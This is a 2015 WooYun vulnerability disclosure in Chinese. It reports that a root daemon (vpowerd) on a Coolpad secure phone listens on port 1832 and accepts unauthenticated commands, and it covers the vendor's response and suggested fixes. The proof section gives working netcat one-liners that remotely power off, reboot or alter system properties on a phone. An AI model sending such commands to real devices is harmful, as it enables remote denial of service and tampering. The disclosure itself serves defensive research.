当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0135312

漏洞标题:酷派安全手机远程代码执行(可远程关闭或重启手机)

相关厂商:yulong.com

漏洞作者: 小荷才露尖尖角

提交时间:2015-08-19 15:58

修复时间:2015-11-22 10:56

公开时间:2015-11-22 10:56

漏洞类型:远程代码执行

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-19: 细节已通知厂商并且等待厂商处理中
2015-08-24: 厂商已经确认,细节仅向厂商公开
2015-08-27: 细节向第三方安全合作伙伴开放
2015-10-18: 细节向核心白帽子及相关领域专家公开
2015-10-28: 细节向普通白帽子公开
2015-11-07: 细节向实习白帽子公开
2015-11-22: 细节向公众公开

简要描述:

酷派某支持双系统隔离的安全手机,可被远程关闭或重启,并可更改系统属性

详细说明:

0x01 测试对象
安全手机领袖——铂顿安全手机,手机配置如图

config.png


0x02 漏洞原理
具有root权限的系统daemon——/system/bin/vpowerd在任意地址的1832端口监听,可远程访问,并传入固定命令。
(1)在1832端口监听
adb shell查看

findport.png


IDA逆向查看

fidport2.png


(2)接受固定命令并执行
如图,

command.png


支持的通过1832端口远程传入的命令包括
1.OOM_ADJ_SCORE|pid=%d:调整指定pid进程的/proc/[pid]/oom_score_adj属性为-1000(未发现有安全影响)
2.INJECT_POWER_POWER_BUTTON:与用户轻按电源键等效,可远程点亮或关闭屏幕。
3.DO_SHUTDOWN:关闭手机。接受该命令后,vpowerd通过system函数执行

am start -a android.intent.ACTION_REQUEST_SHUTDOWN -n android/com.android.server.ShutdownActivity


4.DO_REBOOT:重启手机。接受该命令后,vpowerd通过system函数执行

am start -a android.intent.action.REBOOT -n android/com.android.server.ShutdownActivity


5.SET_PROPERTY|%s %s:设置系统property属性值,其中第一个%s为property key,第二个%s为property value。试验发现可以更改某些系统属性,造成安全影响。

漏洞证明:

下述命令在安全手机双系统中的任何一系统中均有效。
* 远程点亮或关闭屏幕

echo  -n "INJECT_POWER_BUTTON" | nc 192.168.8.172 1832


使用adb logcat -s VPOWER-Daemon:V查看输出

I/VPOWER-Daemon( 1121): POWER button successfully injected to vpower-button-vm2


* 远程关闭、重启手机

echo  -n "DO_SHUTDOWN" | nc 192.168.8.172 1832


echo -n "DO_REBOOT" | nc 192.168.8.172 1832


证明视频见http://pan.baidu.com/s/1o6BtcoU
* 更改系统属性
例如通过

echo  -n "SET_PROPERTY|persist.sys.country us" | nc 192.168.8.172 1832


可更改系统语言为英文,重启后生效。
通过

echo  -n "SET_PROPERTY|persist.yulong.supermode 1" | nc 192.168.8.172 1832


可更改系统模式为“超级安全模式”,重启后生效。
注意到该漏洞位于/system/bin/vpowerd,且后来发现与vpowerd通信的客户端代码属于redbend(一个移动虚拟化或BYOD解决方案提供商,见http://www.redbend.com),因此该漏洞也可能属于铂顿手机所使用的redbend虚拟化软件的漏洞,可能影响到其他基于redbend的安全手机。

修复方案:

1、vpowerd不能在任意地址监听
2、在本地采用其他能够check calling uid or pid的IPC通信方式

版权声明:转载请注明来源 小荷才露尖尖角@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:4

确认时间:2015-08-24 10:54

厂商回复:

需要root,并且不影响用户数据。感谢关注酷派手机安全

最新状态:

2015-08-24:后续会添加uid验证,感谢建议。

2015-08-24:经确认,确实不需root就可操作,后续版本会修复此问题,再次感谢